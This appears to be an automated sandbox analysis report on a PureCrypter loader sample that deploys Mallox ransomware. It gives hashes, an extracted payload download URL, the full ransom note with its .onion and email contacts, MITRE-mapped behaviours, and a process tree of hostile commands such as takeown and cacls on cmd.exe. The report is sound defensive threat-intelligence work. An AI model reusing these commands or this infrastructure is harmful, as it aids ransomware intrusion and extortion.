purecrypter | c599bebc9ae54a54710008042361293d71475e5fbe8f0cbaceb6ee4565a72015

Analysis

max time kernel
103s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
29-03-2023 13:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

80KB
MD5

6ea65106bdd4ab1148028f83956336d1
SHA1

a1e0b3255718cd3478e6a585305427a8f2f3133d
SHA256

c599bebc9ae54a54710008042361293d71475e5fbe8f0cbaceb6ee4565a72015
SHA512

f0968062f384b2760d1f6f0189a70d6adefe2ca5162c6acffb64c351d7dbd0da0db00e56fa4c7ca9cb94f9b6b98ef732593412b6e1e23799aa06b7e394b2c95a
SSDEEP

1536:YnJZzZ0+yQaiu6BkuUIbppIHI+CwthPLO3QeDfI:+Dt0+Faiu6BkuUIbppIHI+Cwt5LOgSfI

Score

10^/10

purecrypter discovery downloader evasion loader ransomware

Malware Config

Extracted

Family

purecrypter

http://80.66.75.37/a-Xmifagl.dll

Extracted

Path

C:\Users\Admin\3D Objects\FILE RECOVERY.txt

Ransom Note

Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: E38FC183AD9BD98940A036F7 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: [email protected] Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. �

Emails

[email protected]

URLs

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion

Signatures

PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.
loader downloader purecrypter

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

pid	Process
4488	Process not Found
7160	Process not Found
396	Process not Found
7312	Process not Found
6140	Process not Found
6852	Process not Found
7264	Process not Found
6968	Process not Found
2352	Process not Found
8172	Process not Found
5908	Process not Found
5008	Process not Found
7016	Process not Found
8188	Process not Found
3724	Process not Found
2104	wevtutil.exe
6700	wevtutil.exe
6868	Process not Found
3356	Process not Found
6500	Process not Found
6908	Process not Found
2244	Process not Found
4692	Process not Found
8036	Process not Found
7740	Process not Found
3532	Process not Found
5184	Process not Found
6356	Process not Found
7792	Process not Found
6016	Process not Found
3448	Process not Found
3672	Process not Found
5724	Process not Found
6540	Process not Found
2296	Process not Found
7636	Process not Found
7756	Process not Found
5260	Process not Found
6836	Process not Found
844	Process not Found
7404	Process not Found
7080	wevtutil.exe
3296	Process not Found
3528	Process not Found
7808	Process not Found
4476	Process not Found
7736	Process not Found
6252	Process not Found
6592	Process not Found
2020	Process not Found
6080	Process not Found
7628	Process not Found
932	Process not Found
6572	Process not Found
6300	Process not Found
1264	Process not Found
6888	Process not Found
5580	Process not Found
1392	Process not Found
6028	Process not Found
6620	wevtutil.exe
7888	Process not Found
3848	Process not Found
7188	Process not Found

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies service settings 1 TTPs
Alters the configuration of existing services.
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	tmp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation	tmp.exe

Modifies file permissions 1 TTPs 18 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1320	takeown.exe
4116	takeown.exe
4628	takeown.exe
5256	takeown.exe
2400	takeown.exe
5872	takeown.exe
448	takeown.exe
3628	takeown.exe
4784	takeown.exe
3172	takeown.exe
372	takeown.exe
2960	takeown.exe
2040	takeown.exe
2696	takeown.exe
1396	takeown.exe
4796	takeown.exe
2436	takeown.exe
4784	takeown.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	tmp.exe
File opened (read-only)	\??\F:	tmp.exe
File opened (read-only)	\??\I:	tmp.exe
File opened (read-only)	\??\J:	tmp.exe
File opened (read-only)	\??\S:	tmp.exe
File opened (read-only)	\??\Y:	tmp.exe
File opened (read-only)	\??\M:	tmp.exe
File opened (read-only)	\??\T:	tmp.exe
File opened (read-only)	\??\V:	tmp.exe
File opened (read-only)	\??\Z:	tmp.exe
File opened (read-only)	\??\P:	tmp.exe
File opened (read-only)	\??\A:	tmp.exe
File opened (read-only)	\??\B:	tmp.exe
File opened (read-only)	\??\G:	tmp.exe
File opened (read-only)	\??\H:	tmp.exe
File opened (read-only)	\??\L:	tmp.exe
File opened (read-only)	\??\N:	tmp.exe
File opened (read-only)	\??\O:	tmp.exe
File opened (read-only)	\??\X:	tmp.exe
File opened (read-only)	\??\K:	tmp.exe
File opened (read-only)	\??\Q:	tmp.exe
File opened (read-only)	\??\R:	tmp.exe
File opened (read-only)	\??\U:	tmp.exe
File opened (read-only)	\??\W:	tmp.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
39	api.ipify.org

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4504 set thread context of 4804	4504	tmp.exe	95

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\THMBNAIL.PNG	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-32_contrast-white.png	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MedTile.scale-125_contrast-black.png	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-125.png	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-96_altform-unplated_devicefamily-colorfulunplated.png	tmp.exe
File created	C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\commerce\FILE RECOVERY.txt	tmp.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\de-de\FILE RECOVERY.txt	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-60_altform-lightunplated.png	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\Retail\Retail_Feedback_icon.png	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\StoreAppList.targetsize-16.png	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\VoiceCommands.xml	tmp.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\ui-strings.js	tmp.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\cloud_secured_lg.png	tmp.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ca-es\FILE RECOVERY.txt	tmp.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\et\FILE RECOVERY.txt	tmp.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_Grace-ul-oob.xrm-ms	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Microsoft.Membership.MeControl\Assets\OfflinePages\Scripts\Me\MeControl\offline\en-US\meBoot.min.js	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\StoreLogo.scale-200_contrast-white.png	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderLogoExtensions.targetsize-32.png	tmp.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\tr-tr\ui-strings.js	tmp.exe
File created	C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.23.28002.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\FILE RECOVERY.txt	tmp.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\FILE RECOVERY.txt	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-125_contrast-white.png	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-black_targetsize-32.png	tmp.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\ThankYou\FILE RECOVERY.txt	tmp.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\root\FILE RECOVERY.txt	tmp.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerEvaluators.exsd	tmp.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\[email protected]	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreAppList.scale-100.png	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Store.Purchase\Controls\WebBlendsControl.xaml	tmp.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\ui-strings.js	tmp.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\en-gb\ui-strings.js	tmp.exe
File created	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\ru-RU\FILE RECOVERY.txt	tmp.exe
File created	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Store.Purchase\Resources\FILE RECOVERY.txt	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarWideTile.scale-400.png	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\RTL\contrast-white\LargeTile.scale-200.png	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-white\LargeTile.scale-200.png	tmp.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\lb.pak.DATA	tmp.exe
File created	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\FILE RECOVERY.txt	tmp.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\FILE RECOVERY.txt	tmp.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.officemui.msi.16.en-us.xml	tmp.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Trial-pl.xrm-ms	tmp.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Trial-ppd.xrm-ms	tmp.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ExcelNaiveBayesCommandRanker.txt	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\OutlookMailWideTile.scale-200.png	tmp.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-down.gif	tmp.exe
File created	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\FILE RECOVERY.txt	tmp.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-uihandler.xml	tmp.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\FILE RECOVERY.txt	tmp.exe
File opened for modification	C:\Program Files\Microsoft Office\root\fre\StartMenu_Win8.mp4	tmp.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_OEM_Perp-ul-phn.xrm-ms	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_Gravel.dxt	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\EmptyView.scale-150.png	tmp.exe
File created	C:\Program Files\Java\jre1.8.0_66\lib\security\FILE RECOVERY.txt	tmp.exe
File created	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\uz-Latn-UZ\View3d\FILE RECOVERY.txt	tmp.exe
File created	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\x86\FILE RECOVERY.txt	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_DogEar.png	tmp.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\FILE RECOVERY.txt	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\mso0127.acl	tmp.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-96_altform-unplated_contrast-black.png	tmp.exe
File created	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\en-us\FILE RECOVERY.txt	tmp.exe
File created	C:\Program Files\VideoLAN\VLC\locale\he\FILE RECOVERY.txt	tmp.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Office Setup Controller\Office.en-us\FILE RECOVERY.txt	tmp.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\FILE RECOVERY.txt	tmp.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1932	sc.exe
7536	sc.exe
5520	sc.exe
5704	sc.exe
6908	Process not Found
5920	sc.exe
6360	sc.exe
5860	sc.exe
7348	sc.exe
6496	Process not Found
6480	sc.exe
7760	sc.exe
6204	sc.exe
6340	sc.exe
4116	sc.exe
5884	Process not Found
700	sc.exe
2640	sc.exe
4220	sc.exe
6848	sc.exe
6164	sc.exe
6888	sc.exe
5452	sc.exe
3132	sc.exe
6272	sc.exe
5948	sc.exe
8072	sc.exe
6852	sc.exe
6924	sc.exe
3764	sc.exe
7008	sc.exe
6460	sc.exe
6836	sc.exe
6632	sc.exe
2256	sc.exe
1720	sc.exe
7368	sc.exe
7896	Process not Found
444	Process not Found
8112	sc.exe
1396	sc.exe
6272	sc.exe
5704	sc.exe
5320	Process not Found
5976	Process not Found
3768	sc.exe
5332	sc.exe
4612	sc.exe
3848	sc.exe
4928	sc.exe
7704	Process not Found
1192	sc.exe
3620	sc.exe
5004	sc.exe
3644	sc.exe
7180	sc.exe
432	sc.exe
5344	sc.exe
6344	sc.exe
5452	sc.exe
5780	sc.exe
5208	sc.exe
8028	sc.exe
7460	Process not Found

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Discovers systems in the same network 1 TTPs 2 IoCs

discovery

Remote System Discovery

T1018

pid	Process
276	net.exe
5612	net.exe

Enumerates processes with tasklist 1 TTPs 6 IoCs

Process Discovery

T1057

pid	Process
5536	tasklist.exe
7504	tasklist.exe
4940	tasklist.exe
4840	tasklist.exe
904	tasklist.exe
6104	tasklist.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
3628	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

pid	Process
6512	taskkill.exe
3832	taskkill.exe
6392	Process not Found
4916	Process not Found
6116	Process not Found
7376	taskkill.exe
5588	Process not Found
6336	taskkill.exe
5004	taskkill.exe
5408	Process not Found
4904	Process not Found
3832	Process not Found
7064	Process not Found
7948	Process not Found
3428	taskkill.exe
7984	Process not Found
5524	Process not Found
7580	Process not Found
7808	taskkill.exe
6460	taskkill.exe
5652	Process not Found
2912	taskkill.exe
5556	taskkill.exe
5288	Process not Found
4900	Process not Found
3960	Process not Found
6684	taskkill.exe
5008	taskkill.exe
3788	Process not Found
5944	Process not Found
6032	Process not Found
1032	Process not Found
6540	Process not Found
292	Process not Found
7924	taskkill.exe
4304	taskkill.exe
6492	Process not Found
7756	Process not Found
6460	Process not Found
4548	taskkill.exe
6828	taskkill.exe
3328	Process not Found
6440	Process not Found
5004	Process not Found
7460	Process not Found
4212	Process not Found
5876	Process not Found
5888	taskkill.exe
1172	taskkill.exe
3320	Process not Found
5876	Process not Found
4172	Process not Found
7088	Process not Found
3160	taskkill.exe
5908	taskkill.exe
5732	Process not Found
3896	Process not Found
7952	Process not Found
6876	Process not Found
2840	Process not Found
4364	Process not Found
5956	Process not Found
5360	Process not Found
6644	Process not Found

Runs net.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2404	powershell.exe
2404	powershell.exe
4804	tmp.exe
4804	tmp.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	4504	tmp.exe
Token: SeDebugPrivilege	2404	powershell.exe
Token: SeTakeOwnershipPrivilege	4804	tmp.exe
Token: SeDebugPrivilege	4804	tmp.exe
Token: SeBackupPrivilege	3396	vssvc.exe
Token: SeRestorePrivilege	3396	vssvc.exe
Token: SeAuditPrivilege	3396	vssvc.exe
Token: SeTakeOwnershipPrivilege	1320	takeown.exe
Token: SeTakeOwnershipPrivilege	448	takeown.exe
Token: SeTakeOwnershipPrivilege	4116	takeown.exe
Token: SeTakeOwnershipPrivilege	372	takeown.exe
Token: SeTakeOwnershipPrivilege	4796	takeown.exe
Token: SeTakeOwnershipPrivilege	3172	takeown.exe
Token: SeTakeOwnershipPrivilege	2400	takeown.exe
Token: SeTakeOwnershipPrivilege	5872	takeown.exe
Token: SeDebugPrivilege	5888	taskkill.exe
Token: SeDebugPrivilege	7924	taskkill.exe
Token: SeDebugPrivilege	6140	taskkill.exe
Token: SeDebugPrivilege	7312	taskkill.exe
Token: SeDebugPrivilege	7292	taskkill.exe
Token: SeDebugPrivilege	5168	net1.exe
Token: SeDebugPrivilege	4160	taskkill.exe
Token: SeDebugPrivilege	6660	Process not Found
Token: SeDebugPrivilege	724	taskkill.exe
Token: SeDebugPrivilege	7868	Process not Found
Token: SeDebugPrivilege	6788	Process not Found
Token: SeDebugPrivilege	6336	taskkill.exe
Token: SeDebugPrivilege	6316	taskkill.exe
Token: SeDebugPrivilege	6576	Process not Found
Token: SeDebugPrivilege	6260	taskkill.exe
Token: SeDebugPrivilege	6164	Process not Found
Token: SeDebugPrivilege	6832	Process not Found
Token: SeDebugPrivilege	6556	Process not Found
Token: SeDebugPrivilege	6448	taskkill.exe
Token: SeDebugPrivilege	8092	Process not Found
Token: SeDebugPrivilege	5456	net1.exe
Token: SeDebugPrivilege	224	Process not Found
Token: SeDebugPrivilege	7108	taskkill.exe
Token: SeDebugPrivilege	6884	taskkill.exe
Token: SeDebugPrivilege	6472	Process not Found
Token: SeDebugPrivilege	3472	taskkill.exe
Token: SeDebugPrivilege	904	tasklist.exe
Token: SeDebugPrivilege	6104	tasklist.exe
Token: SeDebugPrivilege	5536	Process not Found
Token: SeDebugPrivilege	7504	sc.exe
Token: SeDebugPrivilege	4940	tasklist.exe
Token: SeDebugPrivilege	4840	Process not Found
Token: SeDebugPrivilege	2256	Process not Found
Token: SeDebugPrivilege	7124	taskkill.exe
Token: SeDebugPrivilege	7136	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4504 wrote to memory of 2404	4504	tmp.exe	84
PID 4504 wrote to memory of 2404	4504	tmp.exe	84
PID 4504 wrote to memory of 2404	4504	tmp.exe	84
PID 4504 wrote to memory of 4428	4504	tmp.exe	93
PID 4504 wrote to memory of 4428	4504	tmp.exe	93
PID 4504 wrote to memory of 4428	4504	tmp.exe	93
PID 4504 wrote to memory of 4804	4504	tmp.exe	95
PID 4504 wrote to memory of 4804	4504	tmp.exe	95
PID 4504 wrote to memory of 4804	4504	tmp.exe	95
PID 4504 wrote to memory of 4804	4504	tmp.exe	95
PID 4504 wrote to memory of 4804	4504	tmp.exe	95
PID 4504 wrote to memory of 4804	4504	tmp.exe	95
PID 4504 wrote to memory of 4804	4504	tmp.exe	95
PID 4504 wrote to memory of 4804	4504	tmp.exe	95
PID 4504 wrote to memory of 4804	4504	tmp.exe	95
PID 4504 wrote to memory of 4804	4504	tmp.exe	95
PID 4804 wrote to memory of 4252	4804	tmp.exe	102
PID 4804 wrote to memory of 4252	4804	tmp.exe	102
PID 4804 wrote to memory of 4252	4804	tmp.exe	102
PID 4804 wrote to memory of 3628	4804	tmp.exe	103
PID 4804 wrote to memory of 3628	4804	tmp.exe	103
PID 4804 wrote to memory of 4544	4804	tmp.exe	101
PID 4804 wrote to memory of 4544	4804	tmp.exe	101
PID 4804 wrote to memory of 4544	4804	tmp.exe	101
PID 4804 wrote to memory of 2828	4804	tmp.exe	96
PID 4804 wrote to memory of 2828	4804	tmp.exe	96
PID 4804 wrote to memory of 2828	4804	tmp.exe	96
PID 4544 wrote to memory of 3768	4544	cmd.exe	104
PID 4544 wrote to memory of 3768	4544	cmd.exe	104
PID 4544 wrote to memory of 3768	4544	cmd.exe	104
PID 4428 wrote to memory of 2252	4428	cmd.exe	105
PID 4428 wrote to memory of 2252	4428	cmd.exe	105
PID 4428 wrote to memory of 2252	4428	cmd.exe	105
PID 4428 wrote to memory of 1320	4428	cmd.exe	107
PID 4428 wrote to memory of 1320	4428	cmd.exe	107
PID 4428 wrote to memory of 1320	4428	cmd.exe	107
PID 4428 wrote to memory of 3172	4428	cmd.exe	109
PID 4428 wrote to memory of 3172	4428	cmd.exe	109
PID 4428 wrote to memory of 3172	4428	cmd.exe	109
PID 4428 wrote to memory of 1164	4428	cmd.exe	135
PID 4428 wrote to memory of 1164	4428	cmd.exe	135
PID 4428 wrote to memory of 1164	4428	cmd.exe	135
PID 4428 wrote to memory of 3472	4428	cmd.exe	173
PID 4428 wrote to memory of 3472	4428	cmd.exe	173
PID 4428 wrote to memory of 3472	4428	cmd.exe	173
PID 4428 wrote to memory of 232	4428	cmd.exe	112
PID 4428 wrote to memory of 232	4428	cmd.exe	112
PID 4428 wrote to memory of 232	4428	cmd.exe	112
PID 4428 wrote to memory of 1836	4428	cmd.exe	113
PID 4428 wrote to memory of 1836	4428	cmd.exe	113
PID 4428 wrote to memory of 1836	4428	cmd.exe	113
PID 4428 wrote to memory of 1696	4428	cmd.exe	114
PID 4428 wrote to memory of 1696	4428	cmd.exe	114
PID 4428 wrote to memory of 1696	4428	cmd.exe	114
PID 4428 wrote to memory of 2336	4428	cmd.exe	115
PID 4428 wrote to memory of 2336	4428	cmd.exe	115
PID 4428 wrote to memory of 2336	4428	cmd.exe	115
PID 4428 wrote to memory of 3968	4428	cmd.exe	116
PID 4428 wrote to memory of 3968	4428	cmd.exe	116
PID 4428 wrote to memory of 3968	4428	cmd.exe	116
PID 4428 wrote to memory of 4616	4428	cmd.exe	118
PID 4428 wrote to memory of 4616	4428	cmd.exe	118
PID 4428 wrote to memory of 4616	4428	cmd.exe	118
PID 4428 wrote to memory of 4848	4428	cmd.exe	117

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0"	tmp.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4504
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2404
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Iqegwkcaczlekill$-arab.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4428
- - C:\Windows\SysWOW64\reg.exe
    reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
    3⤵
    PID:2252
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\cmd.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3172
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /g Administrators:f
    3⤵
    PID:1164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3472
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /g Users:r
    3⤵
    PID:232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
    3⤵
    PID:1696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2336
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cmd.exe /e /d SERVICE
    3⤵
    PID:3968
- - C:\Windows\SysWOW64\cacls.exe
